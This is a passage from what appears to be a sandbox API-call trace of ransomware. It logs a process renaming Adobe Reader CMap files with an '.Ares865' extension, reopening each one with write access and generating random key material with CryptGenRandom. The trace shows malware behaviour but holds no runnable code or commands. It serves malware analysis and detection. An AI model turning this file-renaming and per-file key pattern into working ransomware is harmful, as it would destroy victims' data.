10.0\\Resource\\CMap\\GBpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-h.ares865"), dwFlags=0x1) returned 1 [0162.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4699) returned 1 [0162.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.091] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.093] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.094] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.094] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.095] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBpc-EUC-UCS2" | out: lpString1="GBpc-EUC-UCS2") returned="GBpc-EUC-UCS2" [0162.095] lstrlenW (lpString="GBpc-EUC-UCS2") returned 13 [0162.095] lstrlenW (lpString="Ares865") returned 7 [0162.095] lstrcmpiW (lpString1="UC-UCS2", lpString2="Ares865") returned 1 [0162.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2.Ares865") returned 76 [0162.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2.ares865"), dwFlags=0x1) returned 1 [0162.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1312) returned 1 [0162.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.098] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.098] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.100] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.101] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.101] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.102] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBpc-EUC-UCS2C" | out: lpString1="GBpc-EUC-UCS2C") returned="GBpc-EUC-UCS2C" [0162.102] lstrlenW (lpString="GBpc-EUC-UCS2C") returned 14 [0162.102] lstrlenW (lpString="Ares865") returned 7 [0162.102] lstrcmpiW (lpString1="C-UCS2C", lpString2="Ares865") returned 1 [0162.102] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C.Ares865") returned 77 [0162.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2c"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2c.ares865"), dwFlags=0x1) returned 1 [0162.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=148118) returned 1 [0162.104] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.116] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.119] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBpc-EUC-V" | out: lpString1="GBpc-EUC-V") returned="GBpc-EUC-V" [0162.119] lstrlenW (lpString="GBpc-EUC-V") returned 10 [0162.119] lstrlenW (lpString="Ares865") returned 7 [0162.119] lstrcmpiW (lpString1="c-EUC-V", lpString2="Ares865") returned 1 [0162.120] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V.Ares865") returned 73 [0162.120] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-v.ares865"), dwFlags=0x1) returned 1 [0162.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3279) returned 1 [0162.123] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.124] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.124] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.126] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.127] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBT-EUC-H" | out: lpString1="GBT-EUC-H") returned="GBT-EUC-H" [0162.127] lstrlenW (lpString="GBT-EUC-H") returned 9 [0162.127] lstrlenW (lpString="Ares865") returned 7 [0162.127] lstrcmpiW (lpString1="T-EUC-H", lpString2="Ares865") returned 1 [0162.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H.Ares865") returned 72 [0162.127] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-h.ares865"), dwFlags=0x1) returned 1 [0162.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.129] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49274) returned 1 [0162.130] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.130] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.130] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.136] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.138] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBT-EUC-V" | out: lpString1="GBT-EUC-V") returned="GBT-EUC-V" [0162.138] lstrlenW (lpString="GBT-EUC-V") returned 9 [0162.138] lstrlenW (lpString="Ares865") returned 7 [0162.138] lstrcmpiW (lpString1="T-EUC-V", lpString2="Ares865") returned 1 [0162.138] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V.Ares865") returned 72 [0162.138] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v.ares865"), dwFlags=0x1) returned 1 [0162.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3275) returned 1 [0162.140] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.143] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.144] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.144] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.144] lstrcpyW (in: lpString1=0x2cce46e, lpString2="H" | out: lpString1="H") returned="H" [0162.144] lstrlenW (lpString="H") returned 1 [0162.144] lstrlenW (lpString="Ares865") returned 7 [0162.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H.Ares865") returned 64 [0162.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h.ares865"), dwFlags=0x1) returned 1 [0162.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5210) returned 1 [0162.147] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.148] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.148] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.152] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.152] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKdla-B5-H" | out: lpString1="HKdla-B5-H") returned="HKdla-B5-H" [0162.152] lstrlenW (lpString="HKdla-B5-H") returned 10 [0162.152] lstrlenW (lpString="Ares865") returned 7 [0162.152] lstrcmpiW (lpString1="la-B5-H", lpString2="Ares865") returned 1 [0162.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H.Ares865") returned 73 [0162.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24471) returned 1 [0162.155] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.163] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.165] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKdla-B5-V" | out: lpString1="HKdla-B5-V") returned="HKdla-B5-V" [0162.165] lstrlenW (lpString="HKdla-B5-V") returned 10 [0162.165] lstrlenW (lpString="Ares865") returned 7 [0162.165] lstrcmpiW (lpString1="la-B5-V", lpString2="Ares865") returned 1 [0162.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V.Ares865") returned 73 [0162.165] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.169] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.169] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3099) returned 1 [0162.170] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.170] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.170] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.173] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.173] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.173] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.174] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKdlb-B5-H" | out: lpString1="HKdlb-B5-H") returned="HKdlb-B5-H" [0162.174] lstrlenW (lpString="HKdlb-B5-H") returned 10 [0162.174] lstrlenW (lpString="Ares865") returned 7 [0162.174] lstrcmpiW (lpString1="lb-B5-H", lpString2="Ares865") returned 1 [0162.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H.Ares865") returned 73 [0162.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22013) returned 1 [0162.177] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.177] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.177] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.182] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.184] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKdlb-B5-V" | out: lpString1="HKdlb-B5-V") returned="HKdlb-B5-V" [0162.184] lstrlenW (lpString="HKdlb-B5-V") returned 10 [0162.184] lstrlenW (lpString="Ares865") returned 7 [0162.184] lstrcmpiW (lpString1="lb-B5-V", lpString2="Ares865") returned 1 [0162.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V.Ares865") returned 73 [0162.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3099) returned 1 [0162.186] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.189] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.190] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.190] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.190] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKgccs-B5-H" | out: lpString1="HKgccs-B5-H") returned="HKgccs-B5-H" [0162.191] lstrlenW (lpString="HKgccs-B5-H") returned 11 [0162.191] lstrlenW (lpString="Ares865") returned 7 [0162.191] lstrcmpiW (lpString1="cs-B5-H", lpString2="Ares865") returned 1 [0162.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H.Ares865") returned 74 [0162.191] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.193] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14442) returned 1 [0162.193] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.197] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.197] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.197] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.198] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKgccs-B5-V" | out: lpString1="HKgccs-B5-V") returned="HKgccs-B5-V" [0162.198] lstrlenW (lpString="HKgccs-B5-V") returned 11 [0162.199] lstrlenW (lpString="Ares865") returned 7 [0162.199] lstrcmpiW (lpString1="cs-B5-V", lpString2="Ares865") returned 1 [0162.199] wsprintfW (in: param_1=0x2ccd198, 